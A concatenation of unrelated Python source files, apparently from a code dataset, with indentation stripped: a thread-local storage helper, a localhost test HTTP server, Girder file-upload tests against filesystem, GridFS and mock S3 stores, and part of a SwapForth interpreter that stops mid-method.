dct = local.dicts.pop(idt)
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
from threading import current_thread, RLock
|
server.py
|
"""
Software License Agreement (Apache 2.0)
Copyright (c) 2020, The MITRE Corporation.
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This project was developed by The MITRE Corporation.
If this code is used in a deployment or embedded within another project,
it is requested that you send an email to opensource@mitre.org in order to
let us know where this software is being used.
"""
# Adapted from https://docs.python.org/3/library/http.server.html
import functools
import http.server
# import os
import threading
from demodocusfw.utils import ROOT_DIR
PORT = None
class ThreadedHTTPServer(object):
def __init__(self, host, port, path=None,
request_handler=http.server.SimpleHTTPRequestHandler):
if path is None:
path = ROOT_DIR
self.path = path
# Requires >= python 3.7
request_handler = functools.partial(request_handler, directory=str(path))
request_handler.directory = str(path)
self.server = http.server.HTTPServer((host, port), request_handler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
print(f"Serving {self.path} on port {self.server.server_address[1]} in thread {self.server_thread.name}")
self.server_thread.start()
def stop(self):
print("Stopping server loop")
self.server.shutdown()
self.server.server_close()
def __del__(self):
self.stop()
def __exit__(self, type, value, traceback):
self.stop()
server = None
def start():
global PORT, server
# Port 0 means to select an arbitrary unused port
HOST, PORT = "localhost", 0
server = ThreadedHTTPServer(HOST, PORT)
ip, PORT = server.server.server_address
server.start()
def stop():
global server
server.stop()
|
upload_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import boto3
import json
import os
import re
import requests
import six
import threading
from six.moves import range
from girder import events
from girder.models.assetstore import Assetstore
from girder.models.file import File
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from girder.utility import assetstore_utilities
from .. import base
from .. import mongo_replicaset
Chunk1, Chunk2 = ('hello ', 'world')
def setUpModule():
base.startServer(mockS3=True)
def tearDownModule():
base.stopServer()
def _send_s3_request(req, data=None):
req = requests.request(
method=req['method'], url=req['url'], headers=req.get('headers', {}), data=data)
if req.status_code != 200:
raise Exception('Moto S3 request error %d: %s' % (req.status_code, req.text))
return req
class UploadTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
admin = {
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'Admin',
'lastName': 'Admin',
'password': 'adminpassword',
'admin': True
}
self.admin = User().createUser(**admin)
user = {
'email': 'good@email.com',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = User().createUser(**user)
folders = Folder().childFolders(parent=self.user, parentType='user', user=self.user)
for folder in folders:
if folder['public'] is True:
self.folder = folder
def _uploadFile(self, name, partial=False, largeFile=False):
"""
Upload a file either completely or partially.
:param name: the name of the file to upload.
:param partial: the number of steps to complete in the uploads: 0
initializes the upload, 1 uploads 1 chunk, etc. False
to complete the upload.
:param largeFile: if True, upload a file that is > 32Mb
:returns: the upload record which includes the upload id.
"""
if largeFile:
chunk1 = '-' * (1024 * 1024 * 32)
chunk2 = '-' * (1024 * 1024 * 1)
else:
chunk1 = Chunk1
chunk2 = Chunk2
resp = self.request(
path='/file', method='POST', user=self.user, params={
'parentType': 'folder',
'parentId': self.folder['_id'],
'name': name,
'size': len(chunk1) + len(chunk2),
'mimeType': 'text/plain'
})
self.assertStatusOk(resp)
upload = resp.json
if partial is not False and partial == 0:
return upload
if 's3' not in upload:
fields = [('offset', 0), ('uploadId', upload['_id'])]
files = [('chunk', 'helloWorld.txt', chunk1)]
resp = self.multipartRequest(
path='/file/chunk', user=self.user, fields=fields, files=files)
self.assertStatusOk(resp)
if partial is not False:
return resp.json
fields = [('offset', len(chunk1)), ('uploadId', upload['_id'])]
files = [('chunk', 'helloWorld.txt', chunk2)]
resp = self.multipartRequest(
path='/file/chunk', user=self.user, fields=fields, files=files)
self.assertStatusOk(resp)
return upload
# s3 uses a different method for uploading chunks
# This has no error checking at all
if not upload['s3']['chunked']:
_send_s3_request(upload['s3']['request'], chunk1+chunk2)
if partial is not False:
return
else:
chunk1 = chunk1+chunk2
s3resp = _send_s3_request(upload['s3']['request'])
matches = re.search('<UploadId>(.*)</UploadId>', s3resp.text)
s3uploadId = matches.groups()[0]
offset = 0
chunkN = 1
etags = []
while len(chunk1):
params = {'offset': offset, 'uploadId': upload['_id']}
params['chunk'] = json.dumps({'s3UploadId': s3uploadId,
'partNumber': chunkN})
resp = self.request(
path='/file/chunk', method='POST', user=self.user, params=params)
self.assertStatusOk(resp)
upload = resp.json
if len(chunk1) > upload['s3']['chunkLength']:
chunk2 = chunk1[upload['s3']['chunkLength']:]
chunk1 = chunk1[:upload['s3']['chunkLength']]
else:
chunk2 = ""
resp = _send_s3_request(upload['s3']['request'], chunk1)
etags.append(resp.headers['ETag'])
chunk1 = chunk2
if partial is not False:
partial -= 1
chunkN += 1
if partial is not False and not partial:
return upload
resp = self.request(
path='/file/completion', method='POST', user=self.user,
params={'uploadId': upload['_id']})
self.assertStatusOk(resp)
if 's3FinalizeRequest' in resp.json:
xml = '<CompleteMultipartUpload>'
for i, tag in enumerate(etags, 1):
xml += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (i, tag)
xml += '</CompleteMultipartUpload>'
_send_s3_request(resp.json['s3FinalizeRequest'], data=xml)
return upload
def _uploadFileWithInitialChunk(self, name, partial=False, largeFile=False, oneChunk=False):
"""
Upload a file either completely or partially, sending the first chunk
with the initial POST.
:param name: the name of the file to upload.
:param partial: the number of steps to complete in the uploads: 1
uploads 1 chunk. False to complete the upload.
:param largeFile: if True, upload a file that is > 32Mb
:param oneChunk: if True, upload everything as one chunk. Otherwise,
upload one chunk when creating the upload and one via the
file/chunk endpoint.
:returns: the upload record which includes the upload id.
"""
if not largeFile:
chunk1 = Chunk1
chunk2 = Chunk2
else:
chunk1 = '-' * (1024 * 1024 * 32)
chunk2 = '-' * (1024 * 1024 * 1)
if oneChunk:
chunk1 += chunk2
chunk2 = ''
params = {
'parentType': 'folder',
'parentId': str(self.folder['_id']),
'name': name,
'size': len(chunk1) + len(chunk2),
'mimeType': 'text/plain',
}
resp = self.request(
path='/file', method='POST', user=self.user,
params=params, body=chunk1, type='text/plain')
self.assertStatusOk(resp)
if partial is not False:
return resp.json
if not oneChunk:
upload = resp.json
params = {'offset': len(chunk1), 'uploadId': upload['_id']}
resp = self.request(
path='/file/chunk', method='POST', user=self.user,
params=params, body=chunk2, type='text/plain')
self.assertStatusOk(resp)
else:
upload = None
self.assertEqual(resp.json['_modelType'], 'file')
return upload
def _testUpload(self):
"""
Upload a file to the server and several partial files. Test that we
can delete a partial upload but not a completed upload. Test that we
can delete partial uploads that are older than a certain date.
"""
completeUpload = self._uploadFile('complete_upload')
# test uploading large files and one-chunk files
self._uploadFile('complete_large_upload', largeFile=True)
self._uploadFileWithInitialChunk('one_chunk_upload', oneChunk=True)
# test partial uploads
partialUploads = []
for largeFile in (False, True):
for partial in range(3):
partialUploads.append(self._uploadFile(
'partial_upload_%d_%s' % (partial, str(largeFile)),
partial, largeFile))
# The admin user should see all of the partial uploads, but not the
# complete uploads
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# We shouldn't be able to delete a completed upload
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin,
params={'uploadId': completeUpload['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to ask for a partial upload by id
resp = self.request(
path='/system/uploads', user=self.admin,
params={'uploadId': partialUploads[0]['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json[0]['_id'], partialUploads[0]['_id'])
# The admin should be able to ask for a partial upload by assetstore id
resp = self.request(
path='/system/uploads', user=self.admin,
params={'assetstoreId': self.assetstore['_id']})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to ask for a partial upload by age.
# Everything should be more than 0 days old
resp = self.request(
path='/system/uploads', user=self.admin, params={'minimumAge': 0})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), len(partialUploads))
# The admin should be able to delete an upload
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin,
params={'uploadId': partialUploads[0]['_id']})
self.assertStatusOk(resp)
self.assertEqual(resp.json[0]['_id'], partialUploads[0]['_id'])
# We should now have one less partial upload
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(len(resp.json), len(partialUploads)-1)
# If we ask to delete everything more than one day old, nothing should
# be deleted.
resp = self.request(
path='/system/uploads', method='DELETE', user=self.admin, params={'minimumAge': 1})
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
# Delete all partial uploads
resp = self.request(path='/system/uploads', method='DELETE', user=self.admin)
self.assertStatusOk(resp)
resp = self.request(path='/system/uploads', user=self.admin)
self.assertEqual(resp.json, [])
def testUploadWithInitialChunk(self):
"""
Upload a file to the server and several partial files. Test that we
can delete a partial upload but not a completed upload. Test that we
can delete partial uploads that are older than a certain date.
"""
self._uploadFileWithInitialChunk('upload1')
self._uploadFileWithInitialChunk('upload2', oneChunk=True)
# test uploading large files
self._uploadFileWithInitialChunk('upload3', largeFile=True)
partialUploads = []
for largeFile in (False, True):
for partial in range(1, 3):
partialUploads.append(self._uploadFileWithInitialChunk(
'partial_upload_%d_%s' % (partial, str(largeFile)),
partial, largeFile))
# check that a user cannot list partial uploads
resp = self.request(path='/system/uploads', method='GET',
user=self.user)
self.assertStatus(resp, 403)
# The admin user should see all of the partial uploads, but not the
# complete upload
resp = self.request(path='/system/uploads', method='GET',
user=self.admin)
self.assertStatusOk(resp)
foundUploads = resp.json
self.assertEqual(len(foundUploads), len(partialUploads))
# Check that the upload model is saved when we are using one chunk
self._uploadWasSaved = 0
def trackUploads(*args, **kwargs):
self._uploadWasSaved += 1
events.bind('model.upload.save', 'uploadWithInitialChunk', trackUploads)
self._uploadFileWithInitialChunk('upload4', oneChunk=True)
# This can be changed to assertEqual if one chunk uploads aren't saved
self.assertGreater(self._uploadWasSaved, 0)
self._uploadWasSaved = 0
# But that it is saved when using multiple chunks
self._uploadFileWithInitialChunk('upload5')
self.assertGreater(self._uploadWasSaved, 0)
events.unbind('model.upload.save', 'uploadWithInitialChunk')
def testFilesystemAssetstoreUpload(self):
self._testUpload()
# Test that a delete during an upload still results in one file
adapter = assetstore_utilities.getAssetstoreAdapter(self.assetstore)
size = 101
data = six.BytesIO(b' ' * size)
files = []
files.append(Upload().uploadFromFile(
data, size, 'progress', parentType='folder', parent=self.folder,
assetstore=self.assetstore))
fullPath0 = adapter.fullPath(files[0])
conditionRemoveDone = threading.Condition()
conditionInEvent = threading.Condition()
def waitForCondition(*args, **kwargs):
# Single that we are in the event and then wait to be told that
# the delete has occured before returning.
with conditionInEvent:
conditionInEvent.notify()
with conditionRemoveDone:
conditionRemoveDone.wait()
def uploadFileWithWait():
size = 101
data = six.BytesIO(b' ' * size)
files.append(Upload().uploadFromFile(
data, size, 'progress', parentType='folder', parent=self.folder,
assetstore=self.assetstore))
events.bind('model.file.finalizeUpload.before', 'waitForCondition',
waitForCondition)
# We create an upload that is bound to an event that waits during the
# finalizeUpload.before event so that the remove will be executed
# during this time.
with conditionInEvent:
t = threading.Thread(target=uploadFileWithWait)
t.start()
conditionInEvent.wait()
self.assertTrue(os.path.exists(fullPath0))
File().remove(files[0])
# We shouldn't actually remove the file here
self.assertTrue(os.path.exists(fullPath0))
with conditionRemoveDone:
conditionRemoveDone.notify()
t.join()
events.unbind('model.file.finalizeUpload.before', 'waitForCondition')
fullPath1 = adapter.fullPath(files[0])
self.assertEqual(fullPath0, fullPath1)
self.assertTrue(os.path.exists(fullPath1))
def testGridFSAssetstoreUpload(self):
# Clear any old DB data
base.dropGridFSDatabase('girder_test_upload_assetstore')
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_test_upload_assetstore')
self.assetstore = assetstore
self._testUpload()
def testGridFSReplicaSetAssetstoreUpload(self):
verbose = 0
if 'REPLICASET' in os.environ.get('EXTRADEBUG', '').split():
verbose = 2
# Starting the replica sets takes time (~25 seconds)
rscfg = mongo_replicaset.makeConfig()
mongo_replicaset.startMongoReplicaSet(rscfg, verbose=verbose)
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
# When the mongo connection to one of the replica sets goes down, it
# takes twice the socket timeout for us to reconnect and get on with
# an upload. We can override the default timeout by passing it as a
# mongodb uri parameter.
assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_assetstore_rs_upload_test',
mongohost='mongodb://127.0.0.1:27070,127.0.0.1:27071,'
'127.0.0.1:27072/?socketTimeoutMS=5000&connectTimeoutMS=2500',
replicaset='replicaset')
self.assetstore = assetstore
self._testUpload()
# Test having the primary replica set going offline and then uploading
# again. If the current primary goes offline, it seems to take mongo
# 30 seconds to elect a new primary. If we step down the current
# primary before pausing it, then the new election will happen in 20
# seconds.
mongo_replicaset.stepDownMongoReplicaSet(rscfg, 0)
mongo_replicaset.waitForRSStatus(
rscfg,
mongo_replicaset.getMongoClient(rscfg, 0),
status=[2, (1, 2), (1, 2)],
verbose=verbose)
mongo_replicaset.pauseMongoReplicaSet(rscfg, [True], verbose=verbose)
self._uploadFile('rs_upload_1')
# Have a different member of the replica set go offline and the first
# come back. This takes a long time, so I am disabling it
# mongo_replicaset.pauseMongoReplicaSet(rscfg, [False, True], verbose=verbose)
# self._uploadFile('rs_upload_2')
# Have the set come back online and upload once more
mongo_replicaset.pauseMongoReplicaSet(rscfg, [False, False], verbose=verbose)
self._uploadFile('rs_upload_3')
mongo_replicaset.stopMongoReplicaSet(rscfg)
def testGridFSShardingAssetstoreUpload(self):
verbose = 0
if 'REPLICASET' in os.environ.get('EXTRADEBUG', '').split():
verbose = 2
# Starting the sharding service takes time
rscfg = mongo_replicaset.makeConfig(port=27073, shard=True, sharddb=None)
mongo_replicaset.startMongoReplicaSet(rscfg, verbose=verbose)
# Clear the assetstore database and create a GridFS assetstore
Assetstore().remove(Assetstore().getCurrent())
self.assetstore = Assetstore().createGridFsAssetstore(
name='Test', db='girder_assetstore_shard_upload_test',
mongohost='mongodb://127.0.0.1:27073', shard='auto')
self._testUpload()
# Verify that we have successfully sharded the collection
adapter = assetstore_utilities.getAssetstoreAdapter(self.assetstore)
stat = adapter.chunkColl.database.command('collstats', adapter.chunkColl.name)
self.assertTrue(bool(stat['sharded']))
# Although we have asked for multiple shards, the chunks may all be on
# one shard. Make sure at least one shard is reported.
self.assertGreaterEqual(len(stat['shards']), 1)
# Asking for the same database again should also report sharding. Use
# a slightly differt URI to ensure that the sharding is checked anew.
assetstore = Assetstore().createGridFsAssetstore(
name='Test 2', db='girder_assetstore_shard_upload_test',
mongohost='mongodb://127.0.0.1:27073/?', shard='auto')
adapter = assetstore_utilities.getAssetstoreAdapter(assetstore)
stat = adapter.chunkColl.database.command('collstats', adapter.chunkColl.name)
self.assertTrue(bool(stat['sharded']))
mongo_replicaset.stopMongoReplicaSet(rscfg)
def testS3AssetstoreUpload(self):
# Clear the assetstore database and create an S3 assetstore
Assetstore().remove(self.assetstore)
params = {
'name': 'S3 Assetstore',
'bucket': 'bucketname',
'prefix': 'testprefix',
'accessKeyId': 'abc',
'secret': '123',
'service': base.mockS3Server.service
}
assetstore = Assetstore().createS3Assetstore(**params)
self.assetstore = assetstore
self._testUpload()
# make an untracked upload to test that we can find and clear it
client = boto3.client(
's3', endpoint_url=base.mockS3Server.service, aws_access_key_id='abc',
aws_secret_access_key='123')
client.create_multipart_upload(Bucket='bucketname', Key='testprefix/abandoned_upload')
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
# Ask to delete it
resp = self.request(path='/system/uploads', method='DELETE', user=self.admin)
self.assertStatusOk(resp)
# Check that it is gone
resp = self.request(path='/system/uploads', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(resp.json, [])
|
nuc.py
|
from __future__ import print_function
from __future__ import division
import sys
import getopt
import struct
from functools import partial
import operator
import array
import copy
import time
import re
if sys.version_info[0] < 3:
input = raw_input
sys.path.append("../shell")
import swapforth
def truth(pred):
return [0, -1][pred]
def setimmediate(func):
func.is_immediate = True
return func
def ba(x):
if type(x) == str:
return array.array('B', [ord(c) for c in x])
elif type(x) == bytes:
return array.array('B', x)
else:
return array.array('B', str(x))
def array2bytes(a):
if hasattr(array.array, 'tostring'):
return a.tostring()
else:
return a.tobytes()
class ForthException(Exception):
def __init__(self, value):
self.value = value
class SwapForth:
def __init__(self, CELL = 4, ENDIAN = '<'):
self.d = [] # data stack
self.r = [] # return stack
self.dict = {} # the dictionary
self.xts = [] # execution token (xt) table
self.ip = 0 # instruction pointer for inner interpreter
self.loopC = 0 # loop count
self.loopL = 0 # loop limit
self.leaves = [] # tracking LEAVEs from DO..LOOP
self.ram = array.array('B') # memory
self.out = sys.stdout.write # default console output
self.CELL = CELL
self.CSIGN = (256 ** self.CELL) >> 1 # Sign bit mask
self.CMASK = (256 ** self.CELL) - 1 # Cell mask
self.cellfmt = ENDIAN + {2: 'h', 4: 'i', 8: 'q'}[self.CELL]
def allot(n, d):
r = partial(self.lit, len(self.ram))
r.__doc__ = d
self.ram.extend([0] * n)
return r
self.tib = allot(256, "TIB")
self.sourcea = allot(self.CELL, "SOURCEA")
self.sourcec = allot(self.CELL, "SOURCEC")
self.sourceid = allot(self.CELL, "SOURCEID")
self.to_in = allot(self.CELL, ">IN")
self.base = allot(self.CELL, "BASE")
self.state = allot(self.CELL, "STATE")
# Run through own bound methods, adding each to the dict
isforth = re.compile(r"[A-Z0-9<>=\-\[\],@!:;+?/*]+$")
for name in dir(self):
o = getattr(self, name)
if not isforth.match(name) and o.__doc__:
# name was not a valid Forth name; try start of the docstring
name = o.__doc__.split()[0]
if callable(o) and isforth.match(name):
self.dict[name] = o
self.DECIMAL()
def u32(self, x):
return x & self.CMASK
def w32(self, x):
x += self.CSIGN
x &= self.CMASK
x -= self.CSIGN
return x
def lit(self, n):
""" push literal N on the stack """
self.d.append(n)
def popn(self, n):
r = self.d[-n:]
self.d = self.d[:-n]
return r
def q(self, s):
for w in s.split():
if w in self.dict:
self.dict[w]()
else:
self.lit(int(w))
def binary(self, op):
b = self.d.pop()
self.d[-1] = self.w32(op(self.d[-1], b))
def dpop(self):
r = self.d.pop() << (8 * self.CELL)
r += self.d.pop() & self.CMASK
return r
def dlit(self, d):
self.lit(self.w32(d & self.CMASK))
self.lit(self.w32(d >> (8 * self.CELL)))
def pops(self):
n = self.d.pop()
a = self.d.pop()
return array2bytes(self.ram[a:a+n]).decode("utf-8")
# Start of Forth words
#
# If the word is a legal Python identifier, then
# use that name. Otherwise (e.g. '+') the Forth name is in
# the docstring.
def HERE(self):
self.lit(len(self.ram))
def THROW(self):
e = self.d.pop()
if e:
raise ForthException(e)
def CATCH(self):
self.q('SOURCEA @ SOURCEC @ >IN @')
self.q('SOURCEID @ >R')
source_spec = self.popn(3)
(ds,rs,ip) = (len(self.d) - 1, len(self.r), self.ip)
try:
self.EXECUTE()
except ForthException as e:
if len(self.d) > ds:
self.d = self.d[:ds]
else:
self.d = self.d + [0] * (ds - len(self.d))
self.r = self.r[:rs]
self.ip = ip
self.lit(source_spec[0])
self.lit(source_spec[1])
self.lit(source_spec[2])
self.q('R> SOURCEID !')
self.q('>IN ! SOURCEC ! SOURCEA !')
self.lit(e.value)
else:
self.lit(0)
def cell_plus(self):
""" CELL+ """
self.d[-1] += self.CELL
def DEPTH(self):
self.lit(len(self.d))
def SOURCE(self):
self.sourcea()
self.fetch()
self.sourcec()
self.fetch()
def fetch(self):
""" @ """
a = self.d.pop()
self.lit(*struct.unpack(self.cellfmt, self.ram[a:a + self.CELL]))
def c_fetch(self):
""" C@ """
a = self.d.pop()
self.lit(self.ram[a])
def store(self):
""" ! """
a = self.d.pop()
x = self.d.pop()
self.ram[a:a + self.CELL] = array.array('B', struct.pack(self.cellfmt, x))
def c_store(self):
""" C! """
a = self.d.pop()
x = self.d.pop()
self.ram[a] = x & 0xff
def comma(self):
""" , """
self.ram.extend(ba(struct.pack(self.cellfmt, self.d.pop())))
def c_comma(self):
""" C, """
self.ram.extend([self.d.pop()])
def slash_string(self):
""" /STRING """
n = self.d.pop()
self.d[-2] += n
self.d[-1] -= n
def PARSE(self):
delim = self.d.pop()
self.q('SOURCE >IN @ /STRING')
self.q('OVER >R')
while True:
if self.d[-1] == 0:
break
if (self.ram[self.d[-2]]) == delim:
break
self.lit(1)
self.slash_string()
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def parse_name(self):
""" PARSE-NAME """
self.q('SOURCE >IN @ /STRING')
def skip(pred):
while True:
if self.d[-1] == 0:
break
if not pred(self.ram[self.d[-2]]):
break
self.lit(1)
self.slash_string()
skip(lambda x: x == 32)
self.q('OVER >R')
skip(lambda x: x != 32)
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def DUP(self):
self.d.append(self.d[-1])
def DROP(self):
self.d.pop()
def NIP(self):
self.d.pop(-2)
def two_drop(self):
""" 2DROP """
self.d.pop()
self.d.pop()
def SWAP(self):
(self.d[-2], self.d[-1]) = (self.d[-1], self.d[-2])
def two_swap(self):
""" 2SWAP """
(self.d[-4], self.d[-3], self.d[-2], self.d[-1]) = (self.d[-2], self.d[-1], self.d[-4], self.d[-3])
def two_over(self):
""" 2OVER """
self.lit(self.d[-4])
self.lit(self.d[-4])
def OVER(self):
self.lit(self.d[-2])
def TUCK(self):
self.SWAP()
self.OVER()
def two_dup(self):
""" 2DUP """
self.d += self.d[-2:]
def to_r(self):
""" >R """
self.r.append(self.d.pop())
def r_from(self):
""" R> """
self.d.append(self.r.pop())
def r_fetch(self):
""" R@ """
self.d.append(self.r[-1])
def n_to_r(self):
""" N>R """
n = self.d.pop()
if n:
self.r += self.d[-n:]
self.d = self.d[:-n]
self.r.append(n)
def n_r_from(self):
""" NR> """
n = self.r.pop()
if n:
self.d += self.r[-n:]
self.r = self.r[:-n]
self.lit(n)
def plus(self):
""" + """
self.binary(operator.__add__)
def minus(self):
""" - """
self.binary(operator.__sub__)
def _and(self):
""" AND """
self.binary(operator.__and__)
def _or(self):
""" OR """
self.binary(operator.__or__)
def _xor(self):
""" XOR """
self.binary(operator.__xor__)
def LSHIFT(self):
self.binary(operator.__lshift__)
def RSHIFT(self):
self.binary(lambda a, b: (a & self.CMASK) >> b)
def two_slash(self):
""" 2/ """
self.d[-1] >>= 1
def equal(self):
""" = """
self.binary(lambda a, b: truth(a == b))
def less_than(self):
""" < """
self.binary(lambda a, b: truth(a < b))
def u_less_than(self):
""" U< """
self.binary(lambda a, b: truth((a & self.CMASK) < (b & self.CMASK)))
def NEGATE(self):
self.d[-1] = self.w32(-self.d[-1])
def INVERT(self):
self.d[-1] = self.w32(self.d[-1] ^ self.CMASK)
def MIN(self):
self.lit(min(self.d.pop(), self.d.pop()))
def MAX(self):
self.lit(max(self.d.pop(), self.d.pop()))
def dplus(self):
""" D+ """
self.dlit(self.dpop() + self.dpop())
def u_m_star(self):
""" UM* """
self.dlit(self.u32(self.d.pop()) * self.u32(self.d.pop()))
def star(self):
""" * """
self.binary(operator.__mul__)
def u_m_slash_mod(self):
""" UM/MOD """
u1 = self.u32(self.d.pop())
ud = self.dpop() & (65536**self.CELL - 1)
self.lit(self.w32(ud % u1))
self.lit(self.w32(ud // u1))
def MS(self):
time.sleep(0.001 * self.d.pop())
def EMIT(self):
self.out(chr(self.d.pop()))
def CR(self):
self.lit(ord('\n'))
self.EMIT()
def SPACE(self):
self.lit(ord(' '))
self.EMIT()
def BL(self):
self.lit(ord(' '))
def WORDS(self):
self.out(" ".join(self.dict))
def xt(self, c):
if not c in self.xts:
self.xts.append(c)
return self.xts.index(c) + 1000
def SFIND(self):
(a, n) = self.d[-2:]
s = array2bytes(self.ram[a:a+n]).decode("utf-8").upper()
# print('HERE', s.decode("utf-8"), self.dict)
if s in self.dict:
x = self.dict[s]
self.d[-2] = self.xt(x)
if hasattr(x, 'is_immediate'):
self.d[-1] = 1
else:
self.d[-1] = -1
else:
self.lit(0)
def EXECUTE(self):
x = self.d.pop()
self.xts[x - 1000]()
@setimmediate
def left_paren(self):
""" [ """
self.lit(0)
self.state()
self.store()
def right_paren(self):
""" ] """
self.lit(1)
self.state()
self.store()
def inner(self, code):
save = self.ip
self.ip = 0
while self.ip < len(code):
c = code[self.ip]
self.ip += 1
c()
self.ip = save
def MARKER(self):
self.parse_name()
name = self.pops().upper()
def restore(here, dict):
del self.ram[here:]
self.dict = dict
self.dict[name] = partial(restore, len(self.ram), copy.copy(self.dict))
def mkheader(self):
self.parse_name()
self.code = []
self.defining = self.pops().upper()
def colon(self):
""" : """
self.mkheader()
self.right_paren()
def endcolon():
self.lastword = partial(self.inner, self.code)
if self.defining in self.dict:
print('warning: refining %s' % self.defining)
self.dict[self.defining] = self.lastword
self.dosemi = endcolon
@setimmediate
def semicolon(self):
""" ; """
self.dosemi()
self.left_paren()
@setimmediate
def RECURSE(self):
self.code.append(partial(self.inner, self.code))
def noname(self):
""" :NONAME """
self.code = []
self.right_paren()
def endnoname():
self.lit(self.xt(partial(self.inner, self.code)))
self.dosemi = endnoname
def IMMEDIATE(self):
setattr(self.lastword, 'is_immediate', True)
@setimmediate
def does(self):
""" DOES> """
def dodoes(code):
del self.code[1:]
self.code.append(partial(self.inner, code))
dobody = []
self.code.append(partial(dodoes, dobody))
self.semicolon()
self.right_paren()
self.code = dobody
self.dosemi = lambda: 0
def to_body(self):
""" >BODY """
code = self.xts[self.d.pop() - 1000].args[0]
code0 = code[0]
self.inner([code0])
def ALLOT(self):
self.ram.extend(ba(chr(0) * self.d.pop()))
@setimmediate
def POSTPONE(self):
self.parse_name()
self.SFIND()
if self.d[-1] == 0:
self.DROP()
assert 0, "Bad postpone %s" % self.pops()
if self.d.pop() < 0:
self.LITERAL()
self.lit(self.xt(self.compile_comma))
self.compile_comma()
def EXIT(self):
self.ip = 99999999;
def ACCEPT(self):
(a, n) = self.popn(2)
s = input()[:n]
ns = len(s)
self.ram[a:a + ns] = s
self.lit(ns)
def to_number(self, base = None):
""" >NUMBER """
if base is None:
self.base()
self.fetch()
base = self.d.pop()
(a, n) = self.popn(2)
ud2 = self.dpop()
try:
while n:
ud2 = base * ud2 + int(chr(self.ram[a]), base)
a += 1
n -= 1
except ValueError:
pass
self.dlit(ud2)
self.lit(a)
self.lit(n)
def DECIMAL(self):
self.lit(10)
self.base()
self.store()
def compile_comma(self):
""" COMPILE, """
self.code.append(self.xts[self.d.pop() - 1000])
def branch(self, x):
self.ip = x
def zbranch(self, x):
if self.d.pop() == 0:
self.ip = x
@setimmediate
def BEGIN(self):
self.lit(len(self.code))
@setimmediate
def AGAIN(self):
self.code.append(partial(self.branch, self.d.pop()))
@setimmediate
def AHEAD(self):
self.lit(len(self.code))
self.code.append(self.branch)
@setimmediate
def m_if(self):
""" IF """
self.lit(len(self.code))
self.code.append(self.zbranch)
@setimmediate
def THEN(self):
p = self.d.pop()
self.code[p] = partial(self.code[p], len(self.code))
@setimmediate
def UNTIL(self):
self.code.append(partial(self.zbranch, self.d.pop()))
@setimmediate
def LITERAL(self):
self.code.append(partial(self.lit, self.d.pop()))
def dodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d.pop()
self.loopL = self.d.pop()
def qdodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d[-1]
self.loopL = self.d[-2]
self._xor()
def doloop(self):
before = self.w32(self.loopC - self.loopL) < 0
